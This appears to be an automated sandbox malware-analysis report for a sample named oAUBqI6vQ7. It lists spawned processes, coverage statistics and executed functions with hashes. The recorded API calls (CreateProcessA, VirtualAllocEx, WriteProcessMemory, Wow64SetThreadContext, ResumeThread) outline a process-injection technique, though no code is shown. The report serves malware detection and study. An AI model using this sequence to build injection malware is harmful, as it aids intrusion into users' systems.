Target ID:	19
Start time:	17:40:14
Start date:	10/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff70ef90000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:40:14
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	288
Total number of Limit Nodes:	22

Executed Functions

Function 018F4B00 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b8a87de0f75bde6d07ac69e14fa952b0b1ebcf72e47768fd4ce5cad41b0e0c
Instruction ID: b78a77036023bee7fda3b5683a36778a1d86e381817f4d07d86a5784915ebd10
Opcode Fuzzy Hash: 90b8a87de0f75bde6d07ac69e14fa952b0b1ebcf72e47768fd4ce5cad41b0e0c
Instruction Fuzzy Hash: E2A106436186C19BCB2AF17D480A7676E90079722CB6D83CED3A6CF7E3D5B6C9518381

Function 018F4218 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a048f45e0e010d69c9446841ffd9befa4b3afc3f22af3a869efb5e5a68946806
Instruction ID: 57ae9982ccf499edcfb7e7b66047466011cf93c4765b66220c074e2ae509e893
Opcode Fuzzy Hash: a048f45e0e010d69c9446841ffd9befa4b3afc3f22af3a869efb5e5a68946806
Instruction Fuzzy Hash: 2C518270E012099FDB08DFA9D894AEEBBF2FF88300F14852AD515AB364DB359941CF55

Function 018F6F93 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc7f065a989d216834dd12c821dcb38e69e5df661aae997940bbeed903299d45
Instruction ID: b2144de49305e1d9b28ff32e75606f4d7394ba5e3eb880398bee4d3e19d19087
Opcode Fuzzy Hash: bc7f065a989d216834dd12c821dcb38e69e5df661aae997940bbeed903299d45
Instruction Fuzzy Hash: 47518274E012099FDB08DFA9D894AEEBBF2FF88300F148069D515AB364DB359941CF91

Function 07DE93A2 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df13fd9479b92071596c8ad81034a880efbba7bd091e7996c95b407f517f9e93
Instruction ID: eb0ae0790c8a6a406a8c93526b1853ccc3ed02360bdd5954490076cb9d615396
Opcode Fuzzy Hash: df13fd9479b92071596c8ad81034a880efbba7bd091e7996c95b407f517f9e93
Instruction Fuzzy Hash: CFD012F0C5F15486CB16FE2098546FCE5BC670F744F84319ED44E62141C271D6504A56

Function 07DE8C86 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48860225a92c33031ee4f136eebac6080a2209a8a78248421a9559d3197c7d40
Instruction ID: 0d52359e611b041e8964193d519b7cd2b3c4795462ba60ed8e80962e05a37839
Opcode Fuzzy Hash: 48860225a92c33031ee4f136eebac6080a2209a8a78248421a9559d3197c7d40
Instruction Fuzzy Hash: 4FD042B485F108DBC761EF54D4995B8FAFCAB4B204F00305A948AA3252D634A9A0CA56

Function 07DE938A Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d486d3ec7471a5ac8651d1941b87428d0b019e054c8099538e7bccb903b6a
Instruction ID: b9aafec9323fed75f3f7f7983e7965537d554876e25abf82100dc8337685f067
Opcode Fuzzy Hash: 229d486d3ec7471a5ac8651d1941b87428d0b019e054c8099538e7bccb903b6a
Instruction Fuzzy Hash: 04B092A0CAF140CAC203BF1454648B8E67C9E1B008F453A8B809B670038444F038812B

Function 076462D9 Relevance: 2.8, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F, xrefs: 07646994
R, xrefs: 076465A0

Memory Dump Source

Source File: 00000000.00000002.1436046681.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID: F$R
API String ID: 0-4292606238
Opcode ID: f8ef6d684958a048f929eac2a265e507d00b80b9aa5ae481c6b6dcd9dc4e7bdb
Instruction ID: efac6293b2d5046aa1d231a9850aae3966782dd9487402c19f74947708d384f3
Opcode Fuzzy Hash: f8ef6d684958a048f929eac2a265e507d00b80b9aa5ae481c6b6dcd9dc4e7bdb
Instruction Fuzzy Hash: CAD1C876600114EFDB05CFA8D984D69BBB2FF4E314B1680A9E60A9B272C732DC61DB51

Function 018FAE59 Relevance: 1.7, APIs: 1, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5152b869321d99ea0545940e4bd1c56995711b6c7b6bebfc34a2a775634bf2
Instruction ID: cc4c90141e8435830429526b76d966400112afbf40db5a4014ec2312fbe9d94a
Opcode Fuzzy Hash: bb5152b869321d99ea0545940e4bd1c56995711b6c7b6bebfc34a2a775634bf2
Instruction Fuzzy Hash: DEA1D0B0A00B458FE729CF69D45075ABBF1FF84310F00892ED29ACBA91D735E905CB91

Function 07DE5354 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DE5596

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d78abcdd6484b86f429a327d5ea54a6146778a22715470cd9380a1c8b8849eee
Instruction ID: 62c289716bcf9c6269de6fcec15fd448341d353efd383bbb2768b79858b6f4af
Opcode Fuzzy Hash: d78abcdd6484b86f429a327d5ea54a6146778a22715470cd9380a1c8b8849eee
Instruction Fuzzy Hash: 7AA17AB1D0021ACFEB21DFA8DC407EEBBB6BF48304F148569E809A7240DB749995CF91

Function 07DE5360 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DE5596

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f450f47c75c4d21fbd61de00c4afd5fa14591e0964ffdb3c4aa66ea060546635
Instruction ID: d4a71ade2c3e58c6874ac0ef3c0b5005a8bc45339521bfc158575eaf5af3daec
Opcode Fuzzy Hash: f450f47c75c4d21fbd61de00c4afd5fa14591e0964ffdb3c4aa66ea060546635
Instruction Fuzzy Hash: 65917AB1D0021ADFEB21DFA8DC407EEBBB6BB48314F148569E809A7240DB749995CF91

Function 057AEE50 Relevance: 1.7, APIs: 1, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,04214104,032308D4,?,00000000), ref: 057AEFBE

Memory Dump Source

Source File: 00000000.00000002.1433437696.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_oAUBqI6vQ7.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c5b9a3d7aa6f07a5a99d8fa7fc18c288ce9c0702b4fd74703fb8faf5a380a26d
Instruction ID: aa9442974c04c1324fc0950879291680def3f0153bb680c7f383d97946eb78f0
Opcode Fuzzy Hash: c5b9a3d7aa6f07a5a99d8fa7fc18c288ce9c0702b4fd74703fb8faf5a380a26d
Instruction Fuzzy Hash: 72719D75A01208EFCB55DFA8D884DAEBBB6FF88714B114598F901AB361DB31EC81DB50

Function 018F590D Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018F59C9

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 92d5ff58a7b8c8e72ceb2fdeb60b1cd522cd3c413d3b25bc05b4333a749e8305
Instruction ID: c33df6ba47dc00d4e3169397f75aecd08521766ce9566176cea5957f8a70e020
Opcode Fuzzy Hash: 92d5ff58a7b8c8e72ceb2fdeb60b1cd522cd3c413d3b25bc05b4333a749e8305
Instruction Fuzzy Hash: FD4102B0C00729CBDB24CFA9C884BDEFBB5BF49304F60806AD508AB251DB716A49CF50

Function 018F44E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018F59C9

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4a570891cbc8533ecdd61f52c3e994a012a3a97922a1a1119ecbe7c41ec8843b
Instruction ID: e5f8e1b6923531bc8b78f04efc505f97db2340329bc3a7a436c6d0909121a4e1
Opcode Fuzzy Hash: 4a570891cbc8533ecdd61f52c3e994a012a3a97922a1a1119ecbe7c41ec8843b
Instruction Fuzzy Hash: 9D41C3B0C0471DCBDB24DFA9C884B9EBBF5BF49304F60806AD518AB251DB756A45CF90

Function 057A4090 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 057A4151

Memory Dump Source

Source File: 00000000.00000002.1433437696.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_oAUBqI6vQ7.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d7810592ddda6be6e9edb8bf66d7511d137734f47f61e117c03fd7eef9a5aa14
Instruction ID: 401437f4cf0ad6174e93762160838b4b20ec6143af6fb049ee833202f02f7119
Opcode Fuzzy Hash: d7810592ddda6be6e9edb8bf66d7511d137734f47f61e117c03fd7eef9a5aa14
Instruction Fuzzy Hash: C24149B5910309DFCB14CF89C848AAABBF6FF98314F24C558E519AB321D375A841CFA0

Function 07DE4BCA Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DE4C86

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b88efe4c0b9b3a0e9d286e2054e1b08e26953e8aecae93b4dc57f41c3d1e5bf
Instruction ID: f8b904aeae2f55ad9d9e3e4ec313e352cb5c0cdd20a7dc05c1a70bc535a4892e
Opcode Fuzzy Hash: 0b88efe4c0b9b3a0e9d286e2054e1b08e26953e8aecae93b4dc57f41c3d1e5bf
Instruction Fuzzy Hash: BE3164B59042898FCF15DFA9C844BEEFBF5EF88314F14842AE555AB250C775A880CBA0

Function 07DE4CD0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DE4D68

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 662c27faf831e3a4e2339137299ceb0a93c297540b0505e7316863b3af59de28
Instruction ID: 29e082a06e4fa2889dad37d20c21ee98f4e805542f49a7078136cf162bb05350
Opcode Fuzzy Hash: 662c27faf831e3a4e2339137299ceb0a93c297540b0505e7316863b3af59de28
Instruction Fuzzy Hash: 382137B19003499FDB10DFA9C885BEEFBF5FF48310F54842AE958A7240D7749951CBA4

Function 07DE4CD8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DE4D68

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 002e545376c07ea210d85aae4853e22e9710ae71f527b779740c164b62051ad7
Instruction ID: 1ae4661acfa6b624faafbcc88729d243b462d0adb5d8f51e1d97d9642779bd68
Opcode Fuzzy Hash: 002e545376c07ea210d85aae4853e22e9710ae71f527b779740c164b62051ad7
Instruction Fuzzy Hash: 71216BB19003499FDF10DFA9C8457DEBBF5FF48310F548429E958A7240C7749541CBA4

Function 07DE51C0 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DE5248

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cc7484ede74c805813533f1c2b8d15a6700f468db2de21bdaa3073265bdde3a9
Instruction ID: 5ce83a503d74e72a9d100ae57b20fc1640ae0073f4e7e8abeb86f37610bec6da
Opcode Fuzzy Hash: cc7484ede74c805813533f1c2b8d15a6700f468db2de21bdaa3073265bdde3a9
Instruction Fuzzy Hash: F9214AB18003199FDB10DF9AC880BEEFBF5FF48310F548429E959A7250C7759551CBA5

Function 018FD738 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FD706,?,?,?,?,?), ref: 018FD7C7

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2171ab9b6b2b010b09e5ec2438a77c8a161af16d020ddb85e964bc9c042ce63d
Instruction ID: 0901db72cb7b27474192f0a0bce79bf6f3e52b1e8bfbe3afda34fa5ee6862de1
Opcode Fuzzy Hash: 2171ab9b6b2b010b09e5ec2438a77c8a161af16d020ddb85e964bc9c042ce63d
Instruction Fuzzy Hash: B32105B5800248AFDB10CF9AD884ADEBFF4EB48310F14841AEA58A7250D374AA55CF65

Function 018FB850 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FD706,?,?,?,?,?), ref: 018FD7C7

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9310d6217ee59da24d938ab7e3123236ee359b8006ac732b8ece5af46622a4f3
Instruction ID: 0fe63efeb5f265ab192d78cdd235b90de6f26bb186d49f9105280aa3495bb9b8
Opcode Fuzzy Hash: 9310d6217ee59da24d938ab7e3123236ee359b8006ac732b8ece5af46622a4f3
Instruction Fuzzy Hash: DC21E5B5900348DFDB10CF9AD484ADEBBF4EB48310F14842AEA54A7351D374A954CFA5

Function 07DE4702 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DE4786

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7be872363a905d9de7999efda6f291e4150e988bb278caabaad86866f3a099a6
Instruction ID: 354169e21858fd34d6dc95d7228e3c06bbbafe4a7faf8d6084dd69a8f8e8e894
Opcode Fuzzy Hash: 7be872363a905d9de7999efda6f291e4150e988bb278caabaad86866f3a099a6
Instruction Fuzzy Hash: 3F2137B19003099FDB10DFAAC4857AEFBF4EF49310F548429E559A7241C7789945CFA4

Function 07DE4708 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DE4786

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b8f05e336f7f440b11f944670d92ec0f32a83eabbe65a673737d50d463aebe74
Instruction ID: a445e6c08b83187d882fdc8754162c4a963fb3255a1bcedf837b78c1ffc680eb
Opcode Fuzzy Hash: b8f05e336f7f440b11f944670d92ec0f32a83eabbe65a673737d50d463aebe74
Instruction Fuzzy Hash: 3C2137B19003099FDB10DFAAC4857AEBBF4EF49210F548429D559A7241C7789945CBA4

Function 07DE51C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DE5248

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7abcf9eb6da36dee233b79c5c830f53c4a1f3b2d424ac015969161b4f2d3ab99
Instruction ID: f55434da05b5608bfe0b25fc8d3649b01a5c5762857306edbad238954370b8da
Opcode Fuzzy Hash: 7abcf9eb6da36dee233b79c5c830f53c4a1f3b2d424ac015969161b4f2d3ab99
Instruction Fuzzy Hash: 642148B18003099FDB10DFAAC840BEEFBF5FF48310F548429E959A7240C7759551CBA4

Function 07DE4C18 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DE4C86

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fb6778cb1cdfc87eaef8f1cfba8c4ed386f60abc3879f80eeadfa8699a839993
Instruction ID: 9ff8be38d3df754261dbcb9261d60712b14a8616c78935dc38c4e315d41674ac
Opcode Fuzzy Hash: fb6778cb1cdfc87eaef8f1cfba8c4ed386f60abc3879f80eeadfa8699a839993
Instruction Fuzzy Hash: 941126B18003499FDB10DFAAC845BEEBBF5EF48310F148829E559A7250C775A951CBA4

Function 07DE4656 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07DE46BA

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d2c7c733d225e688f52b9057c496c4bf0ed5812324c10aa1d1e13e610ea46404
Instruction ID: 1812476dd5783dfc960e8faf731d42954e24c2a8becc3c607499f6d358d9aed0
Opcode Fuzzy Hash: d2c7c733d225e688f52b9057c496c4bf0ed5812324c10aa1d1e13e610ea46404
Instruction Fuzzy Hash: CA1128B19003499FDB10DFAAC4457EEFBF4EF48314F248829D559A7240CB75A545CFA4

Function 07DE4658 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07DE46BA

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e35b3481ac6e5d993065a4fe8056a7be4aabb94fe61ac797e33476279fa347a3
Instruction ID: e2ce67205bf7492920bf2a8bc0378ee28e582aa4ced9bbfc5fea5d244d68d250
Opcode Fuzzy Hash: e35b3481ac6e5d993065a4fe8056a7be4aabb94fe61ac797e33476279fa347a3
Instruction Fuzzy Hash: 5D1136B19003498FDB10DFAAC4457EEFBF8EF88324F24882DD559A7240CB75A944CBA4

Function 018FB058 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 018FB0BE

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e78a4510d2c0d69e5e32b95b44dc67b64afc06b4348ba6a29ff0634fcc68492c
Instruction ID: 65ab48fa17ffb69bc913dc173382c0272a525f81b5647f07f7bd5f1783619d0f
Opcode Fuzzy Hash: e78a4510d2c0d69e5e32b95b44dc67b64afc06b4348ba6a29ff0634fcc68492c
Instruction Fuzzy Hash: FD110FB5C006498FDB10CF9AC444BDEFBF4AF88310F10842AD968A7240D375A645CFA5

Function 07DE4F00 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07DE9C05

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 61f347e86f616981eb9547232a10a2d6e66ef5f52a25c0586d5e3585188c85e3
Instruction ID: b4a1014bb610b2572ae51743b8d1ebca175cfdd2e0dbd65afbfc5ec6b8fb7504
Opcode Fuzzy Hash: 61f347e86f616981eb9547232a10a2d6e66ef5f52a25c0586d5e3585188c85e3
Instruction Fuzzy Hash: D211F2B5800749DFDB10DF9AC884BDEFBF8EB48310F10881AE958A7250C375A984CFA5

Function 07DE9BA1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07DE9C05

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b7ee9f721dde77a04caa8d0925504bd657af2e599bec5de741d2dc9996b3bf90
Instruction ID: fc0cac79be3d8f32cb18e2cebbe3b834bce07d7e2bd56616b46e327deb441665
Opcode Fuzzy Hash: b7ee9f721dde77a04caa8d0925504bd657af2e599bec5de741d2dc9996b3bf90
Instruction Fuzzy Hash: 9111F5B58007499FDB10DF9AC484BDEFBF8EB48310F108819E954A7240D375A584CFA5

Function 0764654B Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

F, xrefs: 07646994

Memory Dump Source

Source File: 00000000.00000002.1436046681.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 24037ffe4864b5af61eaf0b8edb0ad0160f8facbcc6275b4cccf172de26cde3d
Instruction ID: e4518313cad3a0776dd2f0d40811ef9988e8d739526f4e206059447db8e1c3dd
Opcode Fuzzy Hash: 24037ffe4864b5af61eaf0b8edb0ad0160f8facbcc6275b4cccf172de26cde3d
Instruction Fuzzy Hash: BD416EB1A04205DFDB04CFA8C995AADBBF5FF4A310F1584E6E4069B262D731ED41CB51

Function 07647719 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

8, xrefs: 076477B3

Memory Dump Source

Source File: 00000000.00000002.1436046681.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 362e57bfb24d621a910587ad11c39bb64965f93632d421e5237f9578cad5eb24
Instruction ID: 2f34d97c63dbc3b2d7f9e46093c64c46524c075d0602677a1ff6014512b3c7b0
Opcode Fuzzy Hash: 362e57bfb24d621a910587ad11c39bb64965f93632d421e5237f9578cad5eb24
Instruction Fuzzy Hash: 5C31B0B0B1420ADFEB249BA9DD557B97362FB85701F548436E507AB3C1CBB49C02CB61

